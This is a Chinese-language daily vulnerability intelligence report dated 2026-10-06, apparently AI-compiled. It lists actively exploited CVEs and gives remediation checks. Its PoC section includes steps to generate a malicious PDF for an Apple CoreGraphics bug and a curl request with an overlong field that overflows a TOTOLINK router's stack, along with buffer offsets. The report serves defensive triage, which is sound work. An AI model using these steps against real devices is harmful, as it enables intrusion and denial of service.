ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

每日安全情报报告 · 2026-10-06

每日安全情报报告 · 2026-10-06 每日安全情报报告 · 2026-10-06由 AI 整理发布覆盖范围2026-10-05 ~ 2026-10-06近 24–48 小时新增 / 活跃威胁数据来源CISA KEV、NVD、MITRE CVE、The Hacker News、FreeBuf/安全客CN-SEC 聚合、VulnCheck、Fortinet FortiGuard、Citrix、Apple、AWS、GitHub Advisory风险标注 严重 / 高危 / 中危 ⚠️ 在野利用CISA KEV 或厂商确认一、最新高危漏洞CVE⚠️ 在野利用优先处置CVE漏洞类型受影响组件CVSS状态链接CVE-2026-88779SAML 内存溢出DoS / 疑似 RCECitrix NetScaler ADC Gateway启用 SAML SP/IdP8.7⚠️ KEV10-04 加入整改截止 10-07Citrix 公告 THN 报道CVE-2026-86950CoreGraphics 越界写入OOB WriteApple macOS / iOS图像渲染路径8.8⚠️ KEV PoC 已公开THN 报道 CN-SEC 分析CVE-2026-104286路径遍历 NULL 字节任意文件写Fortinet FortiMail9.8⚠️ KEV整改期已过仍活跃CISA KEVCVE-2026-76504认证绕过十六进制编码 URICisco Catalyst SD-WAN Manager9.8⚠️ KEV 在野Cisco 公告CVE-2026-102489 / CVE-2026-102490会话固定 / 权限管理不当RCEZammad 工单系统9.8⚠️ KEV双零日Agentic AI 攻陷 DIVDCISA KEV 近 24–48h 新增严重 / 高危漏洞CVE漏洞类型受影响组件CVSS状态链接CVE-2026-105285QoS 规则栈溢出未认证 RCETOTOLINK A3002MU 路由器固件 1.0.0-B20230403.145510.0公开 PoCgist 暂无官方补丁VulDB 详情 PoCCVE-2026-105134未认证 OS 命令注入AhsayCBS 备份管理平台≤ 10.3.210.0公开利用代码ThreatAft 周评 CVETodoCVE-2026-103956缺失认证无 IdP 即超级管理员接管AWS Loom 1.6.110.0第三方 PoC 已发布AWS 安全公告CVE-2026-102826参数校验绕过 命令注入simple-gitNode.js 库 4.0.08.1PoC 已知GitHub AdvisoryCVE-2026-104181MFA 修改时缺失密码校验账户接管Filamentfilamentphp 5.8.35.4PoC 已知GitHub AdvisoryCVE-2026-105486System API 缺失认证OSSRS / SRS 流媒体≤ 7.0-a17.3公开利用修复 CommitCVE-2026-105209 / CVE-2026-105207 / CVE-2026-105215授权不当 / 外部 IdP 绑定未校验 / Login V1 认证绕过账户接管ZITADEL 身份平台3.x/4.x9.6 / 9.8 / 9.1高危集群CVETodo 日报CVE-2026-98370xfrm compat ALLOCSPI use-after-freeLinux 内核net/xfrmN/A已修复主线Rapid7 条目CVE-2026-104036SSSD NFS idmap 越界写Red Hat Enterprise LinuxSSSD5.8已修复Red Hat 公告CVE-2026-104610Tenda 系列未认证 RCETenda HG 系列路由器10.0公开 PoC持续活跃上期报告重点说明CVE-2026-88779Citrix NetScaler新的 SAML 零日已在定向攻击中被利用研究者在已修复 88771/88772 的蜜罐上仍被突破说明补丁前已被植入后门。前置条件设备作为 SAML SP 或 IdPGateway/AAA。CISA 整改截止10-07需做失陷排查检查/var/log/ns.log、/var/crash/、异常nsppe崩溃、ashell 落盘。CVE-2026-86950Apple CoreGraphics利用坐标转换浮点→32 位定点不一致触发越界写入已有构造函数生成恶意 TrueType 字体 PDF 样本的公开仓库macOS/iOS 预览与 ImageIO 缩略图路径均可触发存在可控越界写入栈/堆任意写潜力。CVE-2026-105285TOTOLINK/boafrm/formIpQoS的comment/entry_name参数经strcpy无长度校验写入 188 字节栈缓冲返回地址约在缓冲起点 504 字节处web 服务以 root 运行、无栈保护可达 RCE目前无官方固件补丁只能收敛管理面暴露。二、最新漏洞 PoC含使用步骤说明标注「PoC」为可复现利用代码标注「检测/验证」为版本核查或利用线索仅供防御侧排查。1. CVE-2026-86950 — Apple CoreGraphics真实 PoC可复现来源califio/publications · MADBugs/CVE-2026-86950风险级别 高危CVSS 8.8已入 KEV使用步骤git clone https://github.com/califio/publications.git cd publications/MADBugs/CVE-2026-86950 pip install fonttools # 如生成脚本需要 python generate_poc.py # 生成带超大坐标的 TrueType 字体 嵌套复合字形缩放的恶意 PDF触发在 macOS/iOS 用「预览」打开附件或经 ImageIO 缩略图生成路径触发越界写入崩溃调试调用栈可见缓冲区低估。⚠️ 仅供安全研究 / 教学勿对非自有设备使用。2. CVE-2026-105285 — TOTOLINK A3002MU公开 PoC来源H3rmesk1t gist VulDB风险级别 严重CVSS 10.0无需认证无官方补丁使用步骤检测/验证建议在隔离环境# 向设备 web 管理口的 QoS 接口发送超长 comment 触发栈溢出 curl -k https://router-ip/boafrm/formIpQoS \ --data addQos1 \ --data comment$(python3 -c print(A*520)) \ --data entry_name$(python3 -c print(B*64)) # 观察管理面是否崩溃 / 设备重启DoS 迹象防御侧收敛/boafrm/*管理面至内网关闭 WAN 远程管理防火墙拦截异常 POST。3. CVE-2026-88779 — Citrix NetScaler检测 / 版本核查非直接利用来源Citrix 安全公告 watchTowr 复现说明风险级别 在野利用KEVCVSS 8.7使用步骤排查是否启用 SAML 前置条件 版本ssh adminnetscaler-ip show runningconfig | grep -i samlAction\|samlIdPProfile # 命中即满足前置条件 show version # 核对版本判定版本低于14.1-73.41或13.1-64.28且启用 SAML SP/IdP → 视为受影响立即升级并做失陷排查。4. CVE-2026-102826 — simple-git检测 升级来源GitHub Advisory风险级别 高危CVSS 8.1PoC 已知使用步骤npm ls simple-git # 确认版本 grep -rn includeIf\|include.path .git/config # 排查恶意 git 配置注入 npm install simple-gitlatest # 升级至 4.0.0含 argv-parser1.1.15. CVE-2026-105134 — AhsayCBS公开利用代码检测来源ThreatAft 周评 CVETodo风险级别 严重CVSS 10.0未认证命令注入公开利用代码使用步骤防御侧# 确认版本是否 10.3.2受影响 # 检查 Replication Receiver 端点是否可从不可信网络访问 curl -k -o /dev/null -w %{http_code} \ https://cbs-host/rps/api/json/UpdateReceivers.do # 若返回 200 且未要求认证 → 高危暴露立即升级至 10.3.4 并限制管理接口6. CVE-2026-105486 — OSSRS / SRS公开利用修复验证来源修复 Commit bb5fde2 VulDB风险级别 高危CVSS 7.3公开利用使用步骤git clone https://github.com/ossrs/srs.git cd srs git checkout 7.0-a1 # 漏洞版本systemAPI.Run 缺失认证 # 升级修复 git checkout v8.0-d0 # 已修复版本三、网络安全最新文章New NetScaler Zero-Day Exploited in Targeted Attacks Can Knock SAML Deployments Offline— The Hacker NewsCVE-2026-88779 深度报道含前置条件与 KEV 时间线阅读原文Cling Botnet Hides Command Traffic Inside STUN Protocol Exchanges— Nozomi Networks / Fortinet FortiGuard利用 CVE-2021-35394 等老漏洞部署 Cling 僵尸网络借公共 STUN 基础设施伪装 C2阅读原文Microsoft Warns of ClickFix Browser Cache Smuggling Attacks Bypassing Windows Defenses— Microsoft Threat Intelligence / 多家媒体ClickFix 新变体将脚本预存浏览器缓存伪装成 PNG绕过 Windows 运行框 260 字符限制阅读原文【CVE-2026-86950】苹果 CoreGraphics 高危漏洞 PoC 公布— 安全客 / 骨哥说事CN-SEC 聚合含越界写入根因与 PoC 仓库阅读原文Google 报告1–8 月漏洞披露量翻倍AI 改变漏洞发现风险结构— CN-SEC 聚合GTIG 数据8 月单月 10,740 个披露AI Agent 发现的漏洞约半数具 RCE 风险今年已 141 个遭野利用阅读原文Week in Review: AI Infra, Exploits CVEs — 29 Sept–5 Oct— ThreatAft本周重点AhsayCBS CVSS 10.0 命令注入、ZITADEL 账户接管集群、Citrix/Cisco 在野利用处置建议阅读原文Realtek Jungle SDK Exploit Attempts Deliver Cling Botnet With STUN-Based C2— Aviatrix Threat ResearchCling 利用 Realtek SDK 历史 RCE 入侵路由器/DVR/IoTSTUN 流量伪装 C2阅读原文部分内容由 AI 辅助生成
返回列表